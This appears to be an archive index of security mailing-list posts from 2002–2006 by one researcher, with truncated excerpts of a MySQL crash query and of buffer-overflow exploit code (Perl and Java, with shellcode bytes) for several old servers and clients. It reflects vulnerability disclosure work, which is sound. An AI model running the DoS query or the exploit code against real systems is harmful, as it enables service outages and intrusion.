MySQL DoS

2006-06-14 Thread Kanatoko
Description: A query like select str_to_date( 1, NULL ); crashes mysqld. Unaffected versions: *= 4.1.18 *= 5.0.19 *= 5.1.6 For more details: http://bugs.mysql.com/bug.php?id=15828 -- Kanatoko[EMAIL PROTECTED] Open Source WebAppFirewall http://guardian.jumperz.net/

AN HTTPD SOCKS4 username Buffer Overflow Vulnerability

2002-10-21 Thread Kanatoko
Version 1.41c SOCKS4 username buffer overflow exploit for Japanese Windows 2000 Pro (SP2) written by Kanatoko [EMAIL PROTECTED] http://www.jumperz.net/ ///*/ import java.net.*; import java.io.*; public class

Re: [SNS Advisory No.55] Eudora 5.x for Windows Buffer Overflow Vulnerability

2002-08-10 Thread Kanatoko
44 $buf .= $jmp_ebx_jp; to $buf .= $jmp_ebx_en; and test it. Sorry for my poor English. #!/usr/local/bin/perl #-- # Eudora Version 5.1.1 Sponsored Mode exploit # for Japanese Windows 2000 Pro (SP2) # written by Kanatoko [EMAIL PROTECTED

Re: Foundstone Advisory - Buffer Overflow in AnalogX Proxy (fwd)

2002-07-26 Thread Kanatoko
by Kanatoko [EMAIL PROTECTED] # http://www.jumperz.net/ # thanx to: hsj (http://hsj.shadowpenguin.org/) #--- use Socket; $connect_host = socks.example.com; $port = 1080; $iaddr = inet_aton($connect_host) || die Host Resolve Error.\n

MatuFtpServer Remote Buffer Overflow and Possible DoS

2002-05-22 Thread Kanatoko
---*/ This exploit code will shutdown target host. #!/usr/local/bin/perl #--- # MatuFtpServer 1.1.3.0 exploit ( for Windows98 ) # written by Kanatoko [EMAIL PROTECTED] # http://www.jumperz.net

Matu FTP remote buffer overflow vulnerability

2002-04-22 Thread Kanatoko
under inetd ) # written by Kanatoko [EMAIL PROTECTED] # http://www.jumperz.net/ #-- $|=1; #egg written by UNYUN (http://www.shadowpenguin.org/) $egg = \xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2; $egg .= \x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF